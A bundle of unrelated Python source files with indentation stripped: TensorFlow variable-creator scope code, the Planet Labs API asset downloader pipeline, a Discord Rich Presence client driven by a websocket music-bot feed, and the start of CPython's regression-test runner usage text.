variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
  The valid keyword arguments in kwargs are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is expected to eventually call the next_creator to create a
variable if it does want to create one, rather than calling Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwargs are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
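# Editor's sketch (not part of the original module): a creator with the
# signature documented above. It logs the requested variable name and defers
# to the next creator in line, which is what keeps creators composable. The
# usage below is left commented out because it needs a live TensorFlow runtime.
def _example_logging_creator(next_creator, **kwargs):
  # kwargs carries the documented keyword arguments (initial_value, name, ...)
  print("creating variable:", kwargs.get("name"))
  return next_creator(**kwargs)
# Assumed usage:
#   with variable_creator_scope(_example_logging_creator):
#     v = variables.Variable(1.0, name="my_var")  # routed through the creator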
|
downloader.py
|
# Copyright 2017 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import threading
import time
from .utils import write_to_file
from planet.api.exceptions import RequestCancelled
try:
import Queue as queue
except ImportError:
# renamed in 3
import queue
def _by_status(assets, types, status):
return [assets[t] for t in types if
t in assets and assets[t]['status'] == status]
def _all_status(assets, types, statuses):
return all([assets[t]['status'] in statuses for t in types if t in assets])
_logger = logging.getLogger(__name__)
_debug = _logger.debug
_info = _logger.info
class _Stage(object):
'''A _Stage performs one step of an activate/poll/download cycle.
The stage will first attempt to process any existing tasks and if there
is capacity, poll for another from the iterator-like source (a _Stage is
one, itself). If the response is False, this implies the source is
exhausted or cancelled. If the response is None, there are no pending
tasks from the source.
When a _Stage has completed a task, it places the output in _results so
they are available. If the task needs repeating, it is placed back in the
task queue.
A _Stage may be limited to a maximum number of 'do' operations per second to
avoid throttling. The current approach is conservative: rather than enforcing a
requests-per-second budget, it sleeps if a request completes in under the
allotted time.
The Downloader uses the following stages:
search-iter -> activation -> polling -> download
where search-iter is an iterator of 'item' features from the API. The
Downloader synchronously drains the download stage, allowing for completion
and cancellation of any in-flight backgrounded requests.
This approach allows for back-pressure from constrained stages as well as
re-queueing tasks without being deadlock prone (e.g. pull vs. push) and
simplifies cancellation of the entire pipeline.
'''
def __init__(self, source, size=0, max_dps=0):
self._source = source
self._running = True
self._cancelled = False
self._size = size
self._tasks = []
# track the current task
self._doing = None
self._results = queue.Queue()
self._min_sleep = 1. / max_dps if max_dps else 0
self._cond = threading.Condition()
def work(self):
return len(self._tasks) + (1 if self._doing else 0)
def start(self):
threading.Thread(target=self._run).start()
def next(self):
try:
return self._results.get()
except queue.Empty:
if not self._alive():
return False
def _i(self, msg, *args):
_info(type(self).__name__ + ' : ' + msg, *args)
def _d(self, msg, *args):
_debug(type(self).__name__ + ' : ' + msg, *args)
def _cancel(self, result):
pass
def cancel(self):
# this makes us not alive
self._cancelled = True
self._running = False
self._tasks = []
self._doing = None
# drain any results and cancel them
while not self._results.empty():
self._results.get()
self._results.put(False)
# notify any sleepers
try:
self._cond.acquire()
self._cond.notify_all()
finally:
self._cond.release()
def _task(self, t):
return t
def _alive(self):
# alive means upstream source has pending stuff or neither upstream
# or this stage have been cancelled or we have some pending tasks
# in the case upstream is done, but we're not
return not self._cancelled and (
self._running or len(self._tasks) or self._doing
)
def _capacity(self):
return len(self._tasks) < self._size
def _get_tasks(self):
while self._capacity() and self._running:
try:
# @todo minor refactor
# bleh, next wants an iterator, not just a __next__
if hasattr(self._source, 'next'):
n = self._source.next()
else:
n = next(self._source)
except StopIteration:
n = False
# upstream is done if False
self._running = n is not False
if n:
n = self._task(n)
n and self._tasks.insert(0, n)
else:
break
def _process_task(self):
if self._tasks:
self._doing = self._tasks.pop(0)
try:
self._do(self._doing)
except Exception:
# @todo should cancel the entire process?
self._running = False
logging.exception('unexpected error in %s', self)
return
self._doing = None
def _run(self):
while self._alive():
self._get_tasks()
t = time.time()
self._process_task()
# note - this is conservative compared to timer invocation.
# allow _at most_ 1 'do' per min_sleep
wait = self._min_sleep - (time.time() - t)
if wait > 0 and not self._cancelled:
self._d('sleep for %.2f', wait)
# waiting on the condition allows interrupting sleep
self._cond.acquire()
self._cond.wait(wait)
self._cond.release()
# sentinel value to indicate we're done
self._results.put(False)
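# Editor's sketch (not part of the original module): a minimal stage following
# the contract described in the _Stage docstring. `check_ready` is a
# hypothetical callable standing in for a real API call; a task is either
# emitted to _results for the next stage or re-queued for another attempt.
class _ExampleStage(_Stage):
    def __init__(self, source, check_ready):
        _Stage.__init__(self, source, size=10, max_dps=2)
        self._check_ready = check_ready
    def _task(self, item):
        # normalize the incoming item, attaching the time it entered the stage
        return item, time.time()
    def _do(self, task):
        item, entered = task
        if self._check_ready(item):
            self._results.put(item)   # hand off to the downstream stage
        else:
            self._tasks.append(task)  # not ready yet; retry on a later pass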
class _AStage(_Stage):
def __init__(self, source, client, asset_types):
_Stage.__init__(self, source, 100, max_dps=5)
self._client = client
self._asset_types = asset_types
def _do(self, item):
assets = self._client.get_assets(item).get()
if not any([t in assets for t in self._asset_types]):
_info('no desired assets in item, skipping')
return
inactive = _by_status(assets, self._asset_types, 'inactive')
if inactive:
# still need activation, try the first inactive
self._client.activate(inactive[0])
self._tasks.append(item)
return
if _all_status(assets, self._asset_types, ['activating', 'active']):
self._results.put((item, assets))
else:
# hmmm
status = [assets[t]['status'] for t in self._asset_types]
raise Exception('unexpected state %s' % status)
class _PStage(_Stage):
_min_poll_interval = 5
def __init__(self, source, client, asset_types):
_Stage.__init__(self, source, 100, max_dps=2)
self._client = client
self._asset_types = asset_types
def _task(self, t):
item, assets = t
now = time.time()
return item, assets, now, now
def _do(self, task):
item, assets, start, last = task
now = time.time()
# don't poll until min interval elapsed
if now - last > self._min_poll_interval:
assets = self._client.get_assets(item).get()
last = now
if _all_status(assets, self._asset_types, ['active']):
_debug('activation took %d', time.time() - start)
self._results.put((item, assets))
else:
self._tasks.append((item, assets, start, last))
class _DStage(_Stage):
def __init__(self, source, client, asset_types, dest):
# @todo max pool should reflect client workers
_Stage.__init__(self, source, 4, max_dps=2)
self._client = client
self._asset_types = asset_types
self._dest = dest
self._write_lock = threading.Lock()
self._written = 0
self._downloads = 0
def _task(self, t):
item, assets = t
for at in self._asset_types:
self._tasks.append((item, assets[at]))
def cancel(self):
while not self._results.empty():
try:
r = self._results.get(block=False)
if r:
item, asset, dl = r
dl.cancel()
except queue.Empty:
pass
_Stage.cancel(self)
def _write_tracker(self, item, asset):
def _tracker(**kw):
if 'skip' in kw:
self._i('skipping download of %s, already exists',
kw['skip'].name)
elif 'wrote' in kw:
with self._write_lock:
self._written += kw['wrote']
return _tracker
def _get_writer(self, item, asset):
return
def _do(self, task):
item, asset = task
writer = write_to_file(
self._dest, self._write_tracker(item, asset), overwrite=False)
self._downloads += 1
self._results.put((item, asset,
self._client.download(asset, writer)))
class Downloader(object):
'''A Downloader manages activation and download of Item Assets from the
Data API. A Downloader should only be processing one request to either
`activate` or `download` at a time. These functions are synchronous and
will return on completion. Completion of activation or download events
can be tracked by changing the `on_complete` method of the Downloader while
the `stats` function allows for polling of internal state.
'''
def shutdown(self):
'''Halt execution.'''
raise NotImplementedError()
def stats(self):
'''Retrieve internal state of the Downloader.
Returns a dict of state:
- paging: `bool` indicating that search results are being processed
- activating: `int` number of items in the inactive or activating state
- downloading: `int` number of items actively downloading
- downloaded: `string` representation of MB transferred
- complete: `int` number of completed downloads
- pending: `int` number of items awaiting download
'''
raise NotImplementedError()
def activate(self, items, asset_types):
'''Request activation of specified asset_types for the sequence of
items.
:param items: a sequence of Item representations.
:param asset_types list: list of asset-type (str)
'''
raise NotImplementedError()
def download(self, items, asset_types, dest):
'''Request activation and download of specified asset_types for the
sequence of items.
:param items: a sequence of Item representations.
:param asset_types list: list of asset-type (str)
:param dest str: Download destination directory, must exist.
'''
raise NotImplementedError()
def on_complete(self, item, asset, path=None):
'''Notification of processing an item's asset, invoked on completion of
`activate` or `download`.
:param item: The API representation of the item
:param asset: The API representation of the asset
:param path: If downloaded, the location of the downloaded asset,
otherwise None
'''
pass
class _Downloader(Downloader):
def __init__(self, client, **opts):
self._client = client
self._opts = opts
self._stages = []
self._completed = 0
self._waiting = None
def activate(self, items, asset_types):
return self._run(items, asset_types)
def download(self, items, asset_types, dest):
return self._run(items, asset_types, dest)
def _init(self, items, asset_types, dest):
client = self._client
astage = _AStage(items, client, asset_types)
pstage = _PStage(astage, client, asset_types)
self._stages = [
astage,
pstage
]
if dest:
dstage = _DStage(pstage, client, asset_types, dest)
self._stages.append(dstage)
self._dest = dest
# sneaky little hack to allow tests to inject options
self._apply_opts(vars())
self._completed = 0
def _run(self, items, asset_types, dest=None):
if self._stages:
raise Exception('already running')
self._init(items, asset_types, dest)
[s.start() for s in self._stages]
last = self._stages[-1]
while self._stages:
try:
n = last.next()
if n is False:
break
# this represents an activation completion, report
# each requested item/asset combo
# @todo hacky lack of internal structure in results
if len(n) == 2:
item, assets = n
for a in asset_types:
self.on_complete(item, assets[a])
# otherwise it is a download
else:
item, asset, self._waiting = n
try:
body = self._waiting.wait()
self._waiting = None
dl = os.path.join(self._dest, body.name)
self.on_complete(item, asset, dl)
except RequestCancelled:
pass
self._completed += 1
except StopIteration:
break
stats = self.stats()
self._stages = []
return stats
def _apply_opts(self, to):
opts = self._opts
opt = opts.pop('no_sleep', False)
if opt:
for s in self._stages:
s._min_sleep = 0
for k in opts:
v, a = k.split('_', 1)
t = to.get(v, None)
if t is None:
raise Exception('option not supported: %s' % k)
else:
setattr(t, a, opts[k])
def stats(self):
stats = {
'paging': False,
'activating': 0,
'pending': 0,
'complete': 0,
}
if len(self._stages) == 3:
stats['downloading'] = 0
stats['downloaded'] = '0.0MB'
if not self._stages:
return stats
astage, pstage = self._stages[:2]
dstage = None if len(self._stages) == 2 else self._stages[2]
if dstage is not None:
mb_written = '%.2fMB' % (dstage._written / 1.0e6)
stats['downloading'] = dstage._downloads - self._completed
stats['downloaded'] = mb_written
stats['paging'] = astage._running
stats['activating'] = astage.work() + pstage.work()
stats['pending'] = (dstage.work() if dstage else 0)
stats['complete'] = self._completed
return stats
def shutdown(self):
for s in self._stages:
s.cancel()
self._waiting and self._waiting.cancel()
self._stages = []
self._client.shutdown()
class _MosaicDownloadStage(_DStage):
def _task(self, t):
return t
def _do(self, task):
func = self._write_tracker(task, None)
writer = write_to_file(self._dest, func, overwrite=False)
self._downloads += 1
self._results.put((task, {'type': 'quad'},
self._client.download_quad(task, writer)))
class _MosaicDownloader(_Downloader):
def activate(self, items, asset_types):
pass
def _init(self, items, asset_types, dest):
client = self._client
dstage = _MosaicDownloadStage(items, client, asset_types, dest)
self._dest = dest
self._stages.append(dstage)
self._apply_opts(vars())
self._completed = 0
def stats(self):
stats = {
'paging': False,
'activating': 0,
'pending': 0,
'complete': 0,
'downloading': 0,
'downloaded': '0.0MB',
}
if not self._stages:
return stats
dstage = self._stages[0]
mb_written = '%.2fMB' % (dstage._written / float(1024**2))
stats['downloading'] = dstage._downloads - self._completed
stats['downloaded'] = mb_written
stats['pending'] = dstage.work()
stats['complete'] = self._completed
return stats
def create(client, mosaic=False, **kw):
'''Create a Downloader with the provided client.
:param mosaic bool: If True, the Downloader will fetch mosaic quads.
:returns: :py:Class:`planet.api.downloader.Downloader`
'''
if mosaic:
return _MosaicDownloader(client, **kw)
else:
return _Downloader(client, **kw)
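# Editor's sketch (not part of the original module): typical use of the factory
# above. `client` is assumed to be an authenticated planet.api client and
# `items` any iterator of Data API item features (e.g. from a search); the
# asset type and destination below are placeholders.
#
#   dl = create(client)
#   dl.on_complete = lambda item, asset, path=None: print(item['id'], path)
#   stats = dl.download(items, ['analytic'], '/tmp/scenes')  # blocks until done
#   print(stats)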
|
rpc_client.py
|
import os
import websockets
import asyncio
import traceback
from discoIPC.ipc import DiscordIPC
import json
import time
import datetime
from traceback import print_exc
import threading
with open("config.json") as f:
config = json.load(f)
urls = list(set([u["url"] for u in config["data"]]))
rpc_clients = {}
langs = {}
for f in os.listdir("./langs"):
if not f.endswith(".json"):
continue
with open(f"./langs/{f}", encoding="utf-8") as file:
langs[f[:-5]] = json.load(file)
def get_thumb(url):
if "youtube.com" in url:
return ["yt", "Youtube"]
if "spotify.com" in url:
return ["spotify", "Spotify"]
if "soundcloud.com" in url:
return ["soundcloud", "Soundcloud"]
def fix_characters(text: str, limit=30):
if len(text) > limit:
return f"{text[:limit - 3]}..."
return text
class RpcTest:
def __init__(self, pipe=0):
self.rpc = {}
self.pipe = pipe
self.user_id = ""
self.user = ""
self.time = None
self.rpc_id = None
self.rpc_info = {}
self.delay = 7
self.clients = {}
self.loop = asyncio.get_event_loop()
self.lang = config["language"]
self.task = None
self.exiting = False
self.bot_ids = [d["bot_id"] for d in config["data"]]
def boot(self):
if not self.loop.is_running():
self.task = self.loop.run_until_complete(self.connect())
self.task = self.loop.run_forever()
else:
self.task = self.loop.create_task(self.connect())
async def destroy(self, bot_id: str):
self.time = None
try:
self.rpc[bot_id].disconnect()
except Exception:
pass
async def start(self):
await self.check_rpc()
for bot_id in self.bot_ids:
if not self.rpc[bot_id].connected:
try:
self.rpc[bot_id].connect()
except Exception:
await self.destroy(bot_id)
del rpc_clients[self.pipe]
self.task.cancel()
self.exiting = True
return
self.user_id = self.rpc[bot_id].data['data']['user']['id']
self.user = f"{self.rpc[bot_id].data['data']['user']['username']}#{self.rpc[bot_id].data['data']['user']['discriminator']}"
print(f"RPC conectado: {self.user} [{self.user_id}] pipe: {self.pipe} | Bot ID: {bot_id}]")
async def check_rpc(self):
if not self.rpc_id:
self.rpc_id = self.bot_ids[0]
for bot_id in self.bot_ids:
if self.rpc.get(bot_id):
continue
try:
try:
self.rpc[bot_id] = DiscordIPC(bot_id, pipe=self.pipe)
except:
traceback.print_exc()
del rpc_clients[self.pipe]
self.task.cancel()
self.exiting = True
except:
continue
async def teardown(self, bot_id):
self.user_id = ""
await self.check_rpc()
try:
self.rpc[bot_id].disconnect()
except Exception as e:
traceback.print_exc()
def get_lang(self, key: str) -> str:
try:
lang = langs[self.lang]
txt: str = lang.get(key)
if not txt:
txt = langs["en-us"].get(key)
except KeyError:
txt = langs["en-us"].get(key)
return txt
async def update(self, bot_id):
await self.check_rpc()
if not self.rpc.get(bot_id):
try:
await self.start()
except:
print_exc()
await self.teardown(bot_id)
return
if not self.rpc[bot_id].connected:
self.rpc[bot_id].connect()
if not self.time:
self.time = time.time()
payload = {
"assets": {
"large_image": "app"
},
"timestamps": {}
}
track = self.rpc_info[bot_id].pop("track", None)
info = self.rpc_info[bot_id].pop("info")
if info and track:
m = info["members"]
payload['assets']['large_text'] = self.get_lang("server") + f': {info["guild"]["name"]} | ' + self.get_lang("channel") + f': #{info["channel"]["name"]} | ' + self.get_lang("listeners") + f': {m}'
payload['details'] = track["title"]
if track["stream"]:
payload['assets']['small_image'] = "stream"
payload['assets']['small_text'] = self.get_lang("stream")
if not track["paused"]:
if not track["stream"]:
startTime = datetime.datetime.now(datetime.timezone.utc)
endtime = (datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(milliseconds=track["duration"] - track["position"]))
payload['timestamps']['end'] = int(endtime.timestamp())
payload['timestamps']['start'] = int(startTime.timestamp())
repeat = track.get('loop')
if repeat:
if isinstance(repeat, list):
repeat_string = f"{self.get_lang('loop_text')}: {repeat[0]}/{repeat[1]}."
elif isinstance(repeat, int):
repeat_string = f"{self.get_lang('loop_remaining')}: {repeat}"
else:
repeat_string = self.get_lang("loop_text")
payload['assets']['small_image'] = "loop"
payload['assets']['small_text'] = repeat_string
else:
source_ico = get_thumb(track.get("url"))
if source_ico:
payload['assets']['small_image'] = source_ico[0]
payload['assets']['small_text'] = source_ico[1]
else:
payload['timestamps']['start'] = time.time()
payload['assets']['small_image'] = "stream"
payload['assets']['small_text'] = "Stream"
else:
payload['assets']['small_image'] = "pause"
payload['assets']['small_text'] = self.get_lang("paused")
state = ""
buttons = []
if track:
if url := track.get("url"):
buttons.append({"label": self.get_lang("listen"), "url": url.replace("www.", "")})
state += f'{self.get_lang("author")}: {track["author"]}'
pl_url = track.get("playlist_url")
pl_name = track.get("playlist_name")
ab_url = track.get("album_url")
ab_name = track.get("album_name")
if not pl_url:
pl_url = "https://cdn.discordapp.com/attachments/480195401543188483/802406033493852201/unknown.png"
if pl_name and pl_url:
if 'youtube.com' in pl_url:
pl_url = "https://www.youtube.com/playlist?list=" + (pl_url.split('?list=' if '?list=' in pl_url else '&list='))[1]
pl_title = f"Playlist: {pl_name}"
if len(pl_title) > 30:
pl_title = pl_name
buttons.append({"label": fix_characters(pl_title), "url": pl_url.replace("www.", "")})
elif state and pl_name:
state += f' | {pl_name}'
elif pl_name:
state += f'{self.get_lang("playlist")}: {pl_name}'
elif ab_url:
ab_final = f'{self.get_lang("album")}: {ab_name}' if len(ab_name) < 21 else ab_name
buttons.append({"label": fix_characters(ab_final, 30), "url": ab_url.replace("www.", "")})
if not state:
state = " "
payload['state'] = state
if buttons:
payload["buttons"] = buttons
else:
self.rpc[bot_id].clear()
return
self.rpc[bot_id].update_activity(payload)
async def connect(self):
try:
await self.start()
except Exception as e:
if not isinstance(e, FileNotFoundError):
traceback.print_exc()
else:
self.task.cancel()
self.exiting = True
del rpc_clients[self.pipe]
return
if self.exiting:
return
for url in urls:
self.clients[url] = self.loop.create_task(self.connect_ws(url))
async def connect_ws(self, url):
if self.exiting:
return
try:
ws = await websockets.connect(url)
a = {"user_id": self.user_id}
await ws.send(json.dumps(a))
while True:
msg = await ws.recv()
try:
data = json.loads(msg)
except Exception:
traceback.print_exc()
continue
op = data.pop("op")
public = data.pop("public", True)
bot_id = str(data.get("bot_id"))
print(f"op: {op} | {self.user} [{self.user_id}] | bot: {bot_id}")
match op:
case "update":
self.rpc_info[bot_id] = data
await self.update(bot_id)
case "idle":
try:
self.rpc_info[bot_id].clear()
except KeyError:
await self.check_rpc()
text_idle = self.get_lang("idle")
data = {
"assets": {
"large_image": "app"
},
"details": text_idle[0],
}
if len(text_idle) > 1:
data['state'] = text_idle[1]
if public:
invite = f"https://discord.com/api/oauth2/authorize?client_id={bot_id}&permissions=8&scope=bot%20applications.commands"
data["buttons"] = [
{
"label": self.get_lang("invite"),
"url": invite
}
]
try:
m = data["info"]["members"]
data['assets']['large_text'] = self.get_lang("server") + f': {data["info"]["guild"]["name"]} | ' + \
self.get_lang("channel") + f': #{data["info"]["channel"]["name"]} | ' + \
self.get_lang("listeners") + f': {m}'
except KeyError:
pass
self.rpc_info[bot_id] = data
self.rpc[bot_id].update_activity(data)
case "close":
try:
self.rpc[bot_id].clear()
except KeyError:
pass
self.rpc_info[bot_id] = {}
case _:
print(f"unknow op: {msg.data}")
except websockets.ConnectionClosed as e:
print(f'Connection to server lost: {url} | Error: {e.code} {e.reason}')
for d in config["data"]:
if d["url"] == url and d["bot_id"] in self.bot_ids:
self.rpc_info[d["bot_id"]].clear()
try:
self.rpc[d["bot_id"]].clear()
except:
continue
if e.code == 1006:
print(f"tentando novamente em {rpc.delay} segundos")
await asyncio.sleep(self.delay)
self.delay *= 2
await self.connect()
except Exception as e:
if not isinstance(e, ConnectionRefusedError):
print(f"Fatal Error Type 1: {type(e)} url: {url}")
traceback.print_exc()
#try:
# self.clients[url].cancel()
#except:
# pass
#del self.clients[url]
#if not self.clients:
# self.loop.close()
await asyncio.sleep(self.delay)
self.delay *= 2
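# Editor's note: the shapes below are inferred from the handlers above and are
# an assumption about the server's schema, shown only to illustrate the ops the
# client understands:
#   {"op": "update", "bot_id": "1234...", "track": {...}, "info": {...}}
#   {"op": "idle",   "bot_id": "1234...", "public": true}
#   {"op": "close",  "bot_id": "1234..."}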
for i in range(9):
rpc = RpcTest(i)
def start_rpc():
try:
rpc.boot()
rpc_clients[i] = rpc
except Exception as e:
print(f"Fatal Error Type 3: {type(e)}")
traceback.print_exc()
del rpc_clients[i]
raise Exception
try:
threading.Thread(target=start_rpc).start()
except (Exception, FileNotFoundError):
continue
while rpc_clients:
time.sleep(15)
|
regrtest.py
|
#! /usr/bin/env python3
"""
Script to run Python regression tests.
Run this script with -h or --help for documentation.
"""
USAGE = """\
python -m test [options] [test_name1 [test_name2 ...]]
python path/to/Lib/test/regrtest.py [options] [test_name1 [test_name2 ...]]
"""
DESCRIPTION = """\
Run Python regression tests.
If no arguments or options are provided, finds all files matching
the pattern "test_*" in the Lib/test subdirectory and runs
them in alphabetical order (but see -M and -u, below, for exceptions).
For more rigorous testing, it is useful to use the following
command line:
python -E -Wd -m test [options] [test_name1 ...]
"""
EPILOG = """\
Additional option details:
-r randomizes test execution order. You can use --randseed=int to provide an
int seed value for the randomizer; this is useful for reproducing troublesome
test orders.
-s On the first invocation of regrtest using -s, the first test file found
or the first test file given on the command line is run, and the name of
the next test is recorded in a file named pynexttest. If run from the
Python build directory, pynexttest is located in the 'build' subdirectory,
otherwise it is located in tempfile.gettempdir(). On subsequent runs,
the test in pynexttest is run, and the next test is written to pynexttest.
When the last test has been run, pynexttest is deleted. In this way it
is possible to single step through the test files. This is useful when
doing memory analysis on the Python interpreter, a process that tends to
consume too many resources to run the full regression test non-stop.
-S is used to continue running tests after an aborted run. It will
maintain the order of a standard run (i.e., this assumes -r is not used).
This is useful after the tests have prematurely stopped for some external
reason and you want to start running from where you left off rather
than starting from the beginning.
-f reads the names of tests from the file given as f's argument, one
or more test names per line. Whitespace is ignored. Blank lines and
lines beginning with '#' are ignored. This is especially useful for
whittling down failures involving interactions among tests.
-L causes the leaks(1) command to be run just before exit if it exists.
leaks(1) is available on Mac OS X and presumably on some other
FreeBSD-derived systems.
-R runs each test several times and examines sys.gettotalrefcount() to
see if the test appears to be leaking references. The argument should
be of the form stab:run:fname where 'stab' is the number of times the
test is run to let gettotalrefcount settle down, 'run' is the number
of times further it is run and 'fname' is the name of the file the
reports are written to. These parameters all have defaults (5, 4 and
"reflog.txt" respectively), and the minimal invocation is '-R :'.
-M runs tests that require an exorbitant amount of memory. These tests
typically try to ascertain that containers keep working when containing more than
2 billion objects, which only works on 64-bit systems. There are also some
tests that try to exhaust the address space of the process, which only makes
sense on 32-bit systems with at least 2Gb of memory. The passed-in memlimit,
which is a string in the form of '2.5Gb', determines how much memory the
tests will limit themselves to (but they may go slightly over). The number
shouldn't be more memory than the machine has (including swap memory). You
should also keep in mind that swap memory is generally much, much slower
than RAM, and setting memlimit to all available RAM or higher will heavily
tax the machine. On the other hand, it is no use running these tests with a
limit of less than 2.5Gb, and many require more than 20Gb. Tests that expect
to use more than memlimit memory will be skipped. The big-memory tests
generally run very, very long.
-u is used to specify which special resource intensive tests to run,
such as those requiring large file support or network connectivity.
The argument is a comma-separated list of words indicating the
resources to test. Currently only the following are defined:
all - Enable all special resources.
none - Disable all special resources (this is the default).
audio - Tests that use the audio device. (There are known
cases of broken audio drivers that can crash Python or
even the Linux kernel.)
curses - Tests that use curses and will modify the terminal's
state and output modes.
largefile - It is okay to run some tests that may create huge
files. These tests can take a long time and may
consume >2GB of disk space temporarily.
network - It is okay to run tests that use external network
resources, e.g. testing SSL support for sockets.
decimal - Test the decimal module against a large suite that
verifies compliance with standards.
cpu - Used for certain CPU-heavy tests.
subprocess - Run all tests for the subprocess module.
urlfetch - It is okay to download files required on testing.
